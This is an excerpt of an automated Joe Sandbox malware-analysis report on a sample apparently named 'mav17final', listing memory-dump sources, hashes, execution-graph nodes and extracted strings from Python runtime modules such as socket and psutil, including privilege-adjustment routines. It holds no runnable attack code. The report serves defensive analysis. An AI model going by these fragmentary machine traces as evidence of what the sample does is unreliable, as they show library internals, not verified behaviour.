                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: :
                                                  • API String ID: 3215553584-336475711
                                                  • Opcode ID: 192b6cbcbdd513becbf883ef8c0b540d55c2aa4c74b0e5f7c665f18236696580
                                                  • Instruction ID: 1cf7b0b7102807eb2252e1dcb1cf6c57e60f380e22a93a0a6952a7e643123b70
                                                  • Opcode Fuzzy Hash: 192b6cbcbdd513becbf883ef8c0b540d55c2aa4c74b0e5f7c665f18236696580
                                                  • Instruction Fuzzy Hash: 7501AD6291C602C6F770BF71A4A2A7EB3A0EF98704FC01435E94E426B5DF2CE5048B34
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF79EA5ABBD
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF79EA56B72,?,?,?,00007FF79EA56A6A,?,?,?,00007FF79EA52342,?,?,00000000,00007FF79EA43FF9), ref: 00007FF79EA5ABD7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                  • String ID: InitializeCriticalSectionEx
                                                  • API String ID: 539475747-3084827643
                                                  • Opcode ID: 3aae4de72f8da0589877f7c5ee30f066c9cb11cf1ae4900690b26ad9603cf222
                                                  • Instruction ID: 00c380706a6630db24845782e67d61788c3d6507fd4c5ff91457b05c63b48dee
                                                  • Opcode Fuzzy Hash: 3aae4de72f8da0589877f7c5ee30f066c9cb11cf1ae4900690b26ad9603cf222
                                                  • Instruction Fuzzy Hash: E7F0B431B18B4181EB246B71B4808B9A321FF89FC0F845035EA4E07B64CE3CD945C3B0
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF79EA5AB61
                                                  • TlsSetValue.KERNEL32(?,?,00000000,00007FF79EA597F6,?,?,00000000,00007FF79EA51385,?,?,?,?,00007FF79EA56855), ref: 00007FF79EA5AB78
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Valuetry_get_function
                                                  • String ID: FlsSetValue
                                                  • API String ID: 738293619-3750699315
                                                  • Opcode ID: ff2a2b461866a750f2fe06eacc14e09380a1ffa156c1b8a627783b45be8ea7ab
                                                  • Instruction ID: 5f4637b7885f90e02f81c5d81b504fee2ec3636594386ac403bcaba048829177
                                                  • Opcode Fuzzy Hash: ff2a2b461866a750f2fe06eacc14e09380a1ffa156c1b8a627783b45be8ea7ab
                                                  • Instruction Fuzzy Hash: 59E06571F08A0291FA247B71F5808B9A222EF89BC0FC85035D95D062B4CE3CE985C370

                                                  Execution Graph

                                                  Execution Coverage:1.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:21.3%
                                                  Total number of Nodes:342
                                                  Total number of Limit Nodes:23
                                                  execution_graph 24990 7ff8bfab42b0 24993 7ff8bfab42e0 24990->24993 24994 7ff8bfab4395 24993->24994 24995 7ff8bfab4334 24993->24995 25001 7ff8bfab4730 IsUserAnAdmin 24994->25001 24995->24994 24996 7ff8bfab436b memcpy 24995->24996 24996->24995 24998 7ff8bfab4493 25003 7ff8bfab49a0 8 API calls 2 library calls 24998->25003 25000 7ff8bfab42c2 25002 7ff8bfab478c 25001->25002 25002->24998 25003->25000 25004 7ff8b93c1060 WSAStartup 25005 7ff8b93c10b0 Py_AtExit 25004->25005 25006 7ff8b93c3108 25004->25006 25008 7ff8b93c10d1 25005->25008 25009 7ff8b93c1159 PyModule_Create2 25005->25009 25007 7ff8b93c313c PyErr_SetString 25006->25007 25014 7ff8b93c311c PyErr_Format 25006->25014 25018 7ff8b93c3162 PyErr_NoMemory 25007->25018 25015 7ff8b93c10f0 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 25008->25015 25010 7ff8b93c1185 PyModule_AddObject PyErr_NewException 25009->25010 25011 7ff8b93c216b 25009->25011 25010->25011 25013 7ff8b93c11cf PyModule_AddObject PyErr_NewException 25010->25013 25041 7ff8b93c2280 8 API calls 2 library calls 25011->25041 25013->25011 25017 7ff8b93c120f PyModule_AddObject PyModule_AddObjectRef PyModule_AddObject 25013->25017 25014->25007 25015->25009 25017->25011 25020 7ff8b93c1268 PyModule_AddObject 25017->25020 25018->25011 25029 7ff8b93c3171 25018->25029 25019 7ff8b93c217d 25020->25011 25021 7ff8b93c128a PyModule_AddObject PyMem_Malloc 25020->25021 25021->25018 25023 7ff8b93c12bb PyCapsule_New 25021->25023 25022 7ff8b93c322a _Py_Dealloc 25022->25011 25024 7ff8b93c3176 25023->25024 25025 7ff8b93c130a PyModule_AddObject 25023->25025 25042 7ff8b93c4b80 _Py_Dealloc _Py_Dealloc _Py_Dealloc PyMem_Free 25024->25042 25026 7ff8b93c1325 150 API calls 25025->25026 25027 7ff8b93c318c 25025->25027 25031 7ff8b93c2037 PyLong_FromUnsignedLong 25026->25031 25027->25029 25030 7ff8b93c3191 _Py_Dealloc 25027->25030 25029->25011 25029->25022 25030->25029 25031->25011 25032 7ff8b93c2048 
PyModule_AddObject 25031->25032 25032->25031 25033 7ff8b93c2066 PyModule_AddIntConstant PyModule_AddIntConstant PyModule_AddIntConstant PyModule_AddIntConstant PyModule_GetDict 25032->25033 25033->25029 25034 7ff8b93c20cd VerSetConditionMask VerSetConditionMask VerSetConditionMask 25033->25034 25035 7ff8b93c214a VerifyVersionInfoA 25034->25035 25035->25011 25036 7ff8b93c31a8 PyUnicode_FromString 25035->25036 25036->25029 25037 7ff8b93c31c8 _PyDict_Pop 25036->25037 25038 7ff8b93c31e5 _Py_Dealloc 25037->25038 25039 7ff8b93c31ee 25037->25039 25038->25039 25039->25029 25039->25035 25040 7ff8b93c31fa _Py_Dealloc 25039->25040 25040->25039 25041->25019 25043 7ff8b9f626c0 25044 7ff8b9f626e4 25043->25044 25045 7ff8b9f673ca PyTuple_GetItem 25044->25045 25046 7ff8b9f6274a 25044->25046 25048 7ff8b9f62831 25044->25048 25049 7ff8b9f6744f 25045->25049 25058 7ff8b9f673e2 PyErr_SetString 25045->25058 25113 7ff8b9f628f0 14 API calls 25046->25113 25052 7ff8b9f6285e 25048->25052 25053 7ff8b9f627b6 25048->25053 25115 7ff8b9f63d98 PyType_IsSubtype 25049->25115 25051 7ff8b9f62781 25051->25048 25051->25053 25056 7ff8b9f67448 25051->25056 25063 7ff8b9f627ad 25051->25063 25061 7ff8b9f67414 PyErr_Format 25052->25061 25062 7ff8b9f674e4 _Py_Dealloc 25052->25062 25078 7ff8b9f62980 25053->25078 25055 7ff8b9f6745e 25055->25058 25059 7ff8b9f67462 PyErr_SetString 25055->25059 25058->25056 25059->25058 25060 7ff8b9f627e8 25064 7ff8b9f627f9 25060->25064 25067 7ff8b9f67500 PyObject_CallFunctionObjArgs 25060->25067 25061->25056 25062->25061 25063->25053 25066 7ff8b9f674cf 25063->25066 25114 7ff8b9f62894 8 API calls 25064->25114 25066->25061 25075 7ff8b9f67404 _Py_Dealloc 25066->25075 25069 7ff8b9f67541 25067->25069 25070 7ff8b9f67523 25067->25070 25073 7ff8b9f67547 _Py_Dealloc 25069->25073 25074 7ff8b9f67550 25069->25074 25070->25069 25072 7ff8b9f67528 25070->25072 25071 7ff8b9f62819 25072->25064 25076 7ff8b9f67532 _Py_Dealloc 25072->25076 25073->25074 25074->25071 25077 7ff8b9f67556 _Py_Dealloc 
25074->25077 25075->25061 25076->25064 25077->25071 25079 7ff8b9f6791e 25078->25079 25080 7ff8b9f629e2 25078->25080 25082 7ff8b9f67926 PyErr_Format 25079->25082 25081 7ff8b9f629ef 25080->25081 25080->25082 25084 7ff8b9f62a16 memset 25081->25084 25083 7ff8b9f6794a 25082->25083 25087 7ff8b9f6796d _Py_Dealloc 25083->25087 25084->25083 25085 7ff8b9f62a3c 25084->25085 25085->25083 25086 7ff8b9f62ad3 25085->25086 25085->25087 25089 7ff8b9f62c78 25085->25089 25090 7ff8b9f6797b 25085->25090 25091 7ff8b9f62a77 PyObject_CallOneArg 25085->25091 25140 7ff8b9f62c90 13 API calls 25085->25140 25088 7ff8b9f62bea 25086->25088 25110 7ff8b9f679f1 PyErr_NoMemory 25086->25110 25111 7ff8b9f62b84 25086->25111 25087->25090 25096 7ff8b9f679ba 25088->25096 25097 7ff8b9f62c00 25088->25097 25107 7ff8b9f62c1b 25088->25107 25143 7ff8b9f62c90 13 API calls 25089->25143 25144 7ff8b9f6d4a0 18 API calls 25090->25144 25091->25085 25091->25090 25095 7ff8b9f67997 25095->25060 25100 7ff8b9f679c1 25096->25100 25101 7ff8b9f679e3 PyLong_FromLong 25096->25101 25098 7ff8b9f679ce 25097->25098 25099 7ff8b9f62c09 25097->25099 25098->25101 25105 7ff8b9f679d5 PyErr_SetFromWindowsErr 25098->25105 25141 7ff8b9f62600 13 API calls 25099->25141 25145 7ff8b9f6d0a8 21 API calls 25100->25145 25101->25107 25103 7ff8b9f62c46 25142 7ff8b9f65930 8 API calls 2 library calls 25103->25142 25105->25107 25107->25103 25109 7ff8b9f62c36 _Py_Dealloc 25107->25109 25108 7ff8b9f62c55 25108->25060 25109->25107 25110->25095 25111->25088 25116 7ff8b9f63bf0 25111->25116 25113->25051 25114->25071 25115->25055 25117 7ff8b9f63c3f ffi_prep_cif 25116->25117 25139 7ff8b9f63d03 25116->25139 25118 7ff8b9f63c62 25117->25118 25117->25139 25121 7ff8b9f63c7a 25118->25121 25122 7ff8b9f63d41 PyEval_SaveThread 25118->25122 25118->25139 25119 7ff8b9f68731 PyErr_SetString 25119->25139 25123 7ff8b9f6876b _errno _errno 25121->25123 25124 7ff8b9f68796 GetLastError SetLastError 25121->25124 25125 7ff8b9f63ca4 ffi_call 25121->25125 25122->25121 25123->25124 

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073080190.00007FF8B93C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF8B93C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2073053555.00007FF8B93C0000.00000002.00000001.01000000.00000008.sdmp
                                                  • Associated: 00000002.00000002.2073128104.00007FF8B93C8000.00000002.00000001.01000000.00000008.sdmp
                                                  • Associated: 00000002.00000002.2073161336.00007FF8B93D0000.00000004.00000001.01000000.00000008.sdmp
                                                  • Associated: 00000002.00000002.2073189700.00007FF8B93D2000.00000002.00000001.01000000.00000008.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b93c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Module_$Constant$Object$ConditionMask$Err_$ExceptionInfoStringVerifyVersion$Capsule_Create2DictExitFormatFromLongLong_MallocMem_StartupUnsigned
                                                  • String ID: 00:00:00:00:00:00$00:00:00:FF:FF:FF$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_DROP_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOP
BACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket$socket.gaierror$socket.herror$timeout
                                                  • API String ID: 2280847565-1299366327
                                                  • Opcode ID: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
                                                  • Instruction ID: 6025f09bfa47ceafd5facd5c340fee966936137d67e47c65ee503b26e6c68a26
                                                  • Opcode Fuzzy Hash: de31a07a70c23239d4b04c80589f0f0a269b501d95a9cdd44f27bf4122d5a2ac
                                                  • Instruction Fuzzy Hash: 7BA2C668B18FA2A5EA14DF1AE8546662331BB4EBD1F847035CE0E06764DEBDE34DC701

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CriticalInfoInitializeLibraryLoadSectionSystemVersion
                                                  • String ID: ABOVE_NORMAL_PRIORITY_CLASS$BELOW_NORMAL_PRIORITY_CLASS$ERROR_ACCESS_DENIED$ERROR_INVALID_NAME$ERROR_PRIVILEGE_NOT_HELD$ERROR_SERVICE_DOES_NOT_EXIST$HIGH_PRIORITY_CLASS$IDLE_PRIORITY_CLASS$INFINITE$MIB_TCP_STATE_CLOSED$MIB_TCP_STATE_CLOSE_WAIT$MIB_TCP_STATE_CLOSING$MIB_TCP_STATE_DELETE_TCB$MIB_TCP_STATE_ESTAB$MIB_TCP_STATE_FIN_WAIT1$MIB_TCP_STATE_FIN_WAIT2$MIB_TCP_STATE_LAST_ACK$MIB_TCP_STATE_LISTEN$MIB_TCP_STATE_SYN_RCVD$MIB_TCP_STATE_SYN_SENT$MIB_TCP_STATE_TIME_WAIT$NORMAL_PRIORITY_CLASS$PSUTIL_CONN_NONE$PSUTIL_DEBUG$REALTIME_PRIORITY_CLASS$TimeoutAbandoned$TimeoutExpired$WINDOWS_10$WINDOWS_7$WINDOWS_8$WINDOWS_8_1$WINDOWS_VISTA$WINVER$_psutil_windows.Error$_psutil_windows.TimeoutAbandoned$_psutil_windows.TimeoutExpired$version
                                                  • API String ID: 926842855-2468274236
                                                  • Opcode ID: 85c7b31a6a932c1691d0eca6bba646cd36cf514f1aeafebe573b9e429b05bbbf
                                                  • Instruction ID: 5ef306d15f9461d4da5b31bad7c47490940ba437eb94a25e01638c24ae866ddd
                                                  • Opcode Fuzzy Hash: 85c7b31a6a932c1691d0eca6bba646cd36cf514f1aeafebe573b9e429b05bbbf
                                                  • Instruction Fuzzy Hash: 4EC11F24B18A9691FF109F2DE9943782B62BF69BF5F808035CA0E46B60DF6CE147C701

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                  • String ID: NtQuerySystemInformation$automatically set for PID 0$psutil_pid_is_running -> 0
                                                  • API String ID: 722747020-1794217337
                                                  • Opcode ID: c7ae699ce2a892379fce2e4808c87eb30de3fe2b6b0b889759ce124942a3d854
                                                  • Instruction ID: 846819f1c4a1f83a1eefd82dfc350ed25948378e3eb59ccb5f160d14c19c56d0
                                                  • Opcode Fuzzy Hash: c7ae699ce2a892379fce2e4808c87eb30de3fe2b6b0b889759ce124942a3d854
                                                  • Instruction Fuzzy Hash: BF512021E08AC682EF509F6AF45417E6BA1FFA8BE4F444135DB4D43B58EE3CE5468740

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Processfprintf$OpenToken$CurrentImpersonateSelf
                                                  • String ID: (originated from %s)$AdjustTokenPrivileges$ImpersonateSelf$LookupPrivilegeValue$OpenProcessToken$SeDebugPrivilege
                                                  • API String ID: 2304922976-3705996988
                                                  • Opcode ID: 05f1a684b56bb86ca3b888b6c1abfd21607b48faccc12cb3d56ba191f6d314fb
                                                  • Instruction ID: 05711faed1e9925cf3523d6e83c1e4378f624f9d8b503aed5f42c51e1ebb3b0e
                                                  • Opcode Fuzzy Hash: 05f1a684b56bb86ca3b888b6c1abfd21607b48faccc12cb3d56ba191f6d314fb
                                                  • Instruction Fuzzy Hash: F7513E31A0CAC681EF509F39E8842A96B64FF647E4F504036DB4E42669DF7CE54BC750

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ddddd)$GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$NtQuerySystemInformation(SystemProcessorPerformanceInformation)$psutil-debug [%s:%d]> $psutil/arch/windows/cpu.c
                                                  • API String ID: 0-2108063674
                                                  • Opcode ID: 2ca73cd30470c9455e3ec07614443548941fff10896586bf88e3bee20af541bc
                                                  • Instruction ID: badb678b66f7d657e960367a5342d406e497ae6a79d7230354cafeec74058ef3
                                                  • Opcode Fuzzy Hash: 2ca73cd30470c9455e3ec07614443548941fff10896586bf88e3bee20af541bc
                                                  • Instruction Fuzzy Hash: A6719831A19A8186EE569F3DA854275B7A6AF65BD0F048331DB0F62750EF3CE4878710

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystem
                                                  • String ID: NtQuerySystemInformation (no PID found)$NtQuerySystemInformation(SystemProcessInformation)
                                                  • API String ID: 3562636166-1914444273
                                                  • Opcode ID: 427dc0625ceb9ddaa0afee0601954c2752e9c2a249e2768820022e836a42a8a8
                                                  • Instruction ID: e8720a6a730c14fef2e45fe8a3c14b4a4055ccb6e6fe28417cc663517a4f65d7
                                                  • Opcode Fuzzy Hash: 427dc0625ceb9ddaa0afee0601954c2752e9c2a249e2768820022e836a42a8a8
                                                  • Instruction Fuzzy Hash: 0B312331A0D6C282FF548F19A4506796BE1FFA8BE4F145435EB4E877A4DE3DE4828710

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID:
                                                  • API String ID: 145871493-0
                                                  • Opcode ID: c4961b64c7e64f6e4fbbe085665ff08e943201d771d0e41144107d4a87dedda4
                                                  • Instruction ID: 56e26c6fe6311b3daf6eb81b7e5572e1518195ebf59956193f5dd1e91bc63355
                                                  • Opcode Fuzzy Hash: c4961b64c7e64f6e4fbbe085665ff08e943201d771d0e41144107d4a87dedda4
                                                  • Instruction Fuzzy Hash: 2201F420B0DAC181EE549F66B94813E6761AF68FE4B184434DF4E87B54DE3CD4578700

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryProc$FreeHandleLoadModule
                                                  • String ID: GetActiveProcessorCount$GetExtendedTcpTable$GetExtendedUdpTable$GetLogicalProcessorInformationEx$GetTickCount64$NtQueryInformationProcess$NtQueryObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtResumeProcess$NtSetInformationProcess$NtSuspendProcess$RtlGetVersion$RtlIpv4AddressToStringA$RtlIpv6AddressToStringA$RtlNtStatusToDosErrorNoTeb$WTSEnumerateSessionsW$WTSFreeMemory$WTSQuerySessionInformationW$iphlpapi.dll$kernel32$ntdll$ntdll.dll$wtsapi32.dll
                                                  • API String ID: 3023338733-761253638
                                                  • Opcode ID: 40eaee2ffd6f01f50de0b2aac545704ad0fe2f6a6e437eb824291176764a6811
                                                  • Instruction ID: 364af58f0c1f907db20adf2747ae927ab553415c2572c77388e22d324298fc69
                                                  • Opcode Fuzzy Hash: 40eaee2ffd6f01f50de0b2aac545704ad0fe2f6a6e437eb824291176764a6811
                                                  • Instruction Fuzzy Hash: DDC1D460A09A8791EE849F2CF8851B52BE1BF687E4B848135C70D466A1EF7CE59BC300

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
